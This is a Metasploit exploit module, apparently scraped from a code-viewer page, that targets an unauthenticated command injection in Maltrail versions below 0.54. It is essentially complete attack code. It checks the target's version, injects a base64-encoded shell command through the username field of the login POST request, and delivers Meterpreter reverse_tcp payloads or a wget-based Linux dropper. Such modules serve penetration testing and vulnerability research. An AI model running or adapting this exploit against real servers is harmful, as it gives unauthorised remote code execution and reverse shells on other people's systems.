Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Maltrail Unauthenticated Command Injection',17'Description' => %q{18Maltrail is a malicious traffic detection system, utilizing publicly19available blacklists containing malicious and/or generally suspicious trails.20The Maltrail versions < 0.54 is suffering from a command injection vulnerability.21The `subprocess.check_output` function in `mailtrail/core/http.py` contains22a command injection vulnerability in the `params.get("username")` parameter.23An attacker can exploit this vulnerability by injecting arbitrary OS commands24into the username parameter. The injected commands will be executed with the25privileges of the running process. This vulnerability can be exploited remotely26without authentication.2728Successfully tested against Maltrail versions 0.52 and 0.53.29},30'License' => MSF_LICENSE,31'Author' => [32'Ege BALCI <egebalci[at]pm.me>', # msf module33'Chris Wild', # original PoC, analysis34],35'References' => [36['EDB', '51676'],37['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],38['URL', 'https://github.com/stamparm/maltrail/issues/19146']39],40'Platform' => ['unix', 'linux'],41'Privileged' => false,42'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],43'Targets' => [44[45'Unix Command',46{47'Platform' => 'unix',48'Arch' => ARCH_CMD,49'Type' => :unix_cmd,50'DefaultOptions' => {51'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'52}53}54],55[56'Linux Dropper',57{58'Platform' => 'linux',59'Arch' => [ARCH_X86, ARCH_X64],60'Type' => :linux_dropper,61'CmdStagerFlavor' => :wget,62'DefaultOptions' => {63'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'64}65}66]67],68'DisclosureDate' => '2023-07-31',69'DefaultTarget' => 0,70'Notes' => {71'Stability' => [CRASH_SAFE],72'Reliability' => [REPEATABLE_SESSION],73'SideEffects' => []74}75)76)77register_options(78[79Opt::RPORT(8338),80OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])81]82)83end8485def check86res = send_request_cgi(87'uri' => normalize_uri(target_uri.path),88'method' => 'GET'89)90return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?91return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 2009293version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}9495if version < Rex::Version.new('0.54')96return CheckCode::Appears("Version Detected: #{version}")97end9899CheckCode::Safe("Version Detected: #{version}")100end101102def execute_command(cmd, _opts = {})103send_request_raw( # This needs to be a raw requess cuz we don't wanna URL encode the body104'uri' => normalize_uri(target_uri.path, 'login'),105'method' => 'POST',106'headers' => {107'ctype' => 'application/x-www-form-urlencoded'108},109'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the +110)111end112113def exploit114case target['Type']115when :unix_cmd116print_status("Executing #{target.name}...")117execute_command(payload.encoded)118when :linux_dropper119print_status("Executing #{target.name}...")120execute_cmdstager121end122end123end124125126